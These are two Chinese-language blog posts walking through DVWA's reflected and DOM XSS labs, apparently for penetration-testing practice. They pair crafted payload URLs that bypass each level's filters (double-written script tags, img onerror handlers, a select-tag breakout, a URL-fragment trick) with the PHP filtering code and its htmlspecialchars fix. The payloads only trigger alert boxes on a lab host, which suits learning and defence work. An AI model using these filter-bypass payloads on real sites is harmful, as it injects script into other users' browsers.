发表更新penetration Test / train2 分钟读完 (大约303个字)

something about DVWA - XSS(Reflected)

DVWA

DVWA => 备份地址

XSS(Reflected)

XSS是跨站脚本攻击Cross-site scriptingReflected类型是 反射型XSS攻击,此类型的XSS未保存在目标服务器上,是攻击者恶意插入在html中的内容。

Low

  • 手动测试

    在URL中构造恶意参数。

    1
    http://train.com/dvwa/vulnerabilities/xss_r/?name=<script>alert('bad');</script>

  • 源码分析

    • 将页面输入的内容直接输入至拼接至页面渲染

      1
      2
      3
      4
      5
      // Is there any input?
      if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
          // Feedback for end user
          echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
      }

Medium

  • 手动测试

    • 双写<script>

      构造双写<script><script<script>>;

      1
      http://train.com/dvwa/vulnerabilities/xss_r/?name=<script<script>>alert('bad');</script>

  • 源码分析

    • 过滤<scrip>标签

      1
      2
      // Get input
      $name = str_replace( '<script>', '', $_GET[ 'name' ] );

High

  • 手动测试

    • 采用<img/>标签

      利用<img/>标签的onerror机制,构造恶意URL。

      1
      http://train.com/dvwa/vulnerabilities/xss_r/?name=<img src="nothing" onerror="alert('bad');"/>

  • 源码分析

    • 以正则表达式的方式过滤<script>标签
    1
    2
    // Get input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

Impossible

  • 源码分析

    • 将参数转义为html符号实体

      使用htmlspecialchars()函数将如<等特殊符号转义为&lt;html实体。

      1
      2
      // Get input
      $name = htmlspecialchars( $_GET[ 'name' ] );
 
发表更新penetration Test / train2 分钟读完 (大约256个字)

something about DVWA - XSS(DOM)

DVWA

DVWA => 备份地址

XSS(DOM)

XSS是跨站脚本攻击Cross-site scripting。 DOM类型的XSS是基于DOM文档对象模型的一种漏洞。

Low

  • 手动测试

    在URL中构造恶意参数:

    1
    2
    3
    # %3C <
    # %3E >
    http://train.com/dvwa/vulnerabilities/xss_d/?default=<script>alert("bad");</script>

  • 源码分析

    纯前端内容,无特殊。

Medium

  • 手动测试

    由于禁止了<script>标签,因此改用<img/>标签的onerror机制。

    构造恶意URL:

    1
    2
    3
    # `"</select>` 用于闭合`<select>标签`
    # `<img/>` 用于恶意XSS
    http://train.com/dvwa/vulnerabilities/xss_d/?default="</select><img src="1" onerror="alert('bad');"/>

  • 源码分析

    • 禁止<script>标签:

      1
      2
      3
      4
      5
      # Do not allow script tags
      if (stripos ($default, "<script") !== false) {
          header ("location: ?default=English");
          exit;
      }

High

  • 手动测试

    尽管采用了白名单机制,但是,由于phphtml注释符的差异性,可以绕过;即php注释掉的内容,在html中会正常渲染。

    构造恶意URL

    1
    http://train.com/dvwa/vulnerabilities/xss_d/?default=French#<script>alert("bad");</script>

  • 源码分析

    采用白名单机制。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    # White list the allowable languages
    switch ($_GET['default']) {
        case "French":
        case "English":
        case "German":
        case "Spanish":
            # ok
            break;
        default:
            header ("location: ?default=English");
            exit;
    }

Impossible

  • 源码分析

    服务端不做过多处理,客户端做防护:浏览器过滤XSS,过滤用户输入等。

XSS常用标签

  • script

    1
    <script>alert("bad");</script>

  • img

    1
    <img src="nothing" onerror="alert('bad');" />
 

归档

×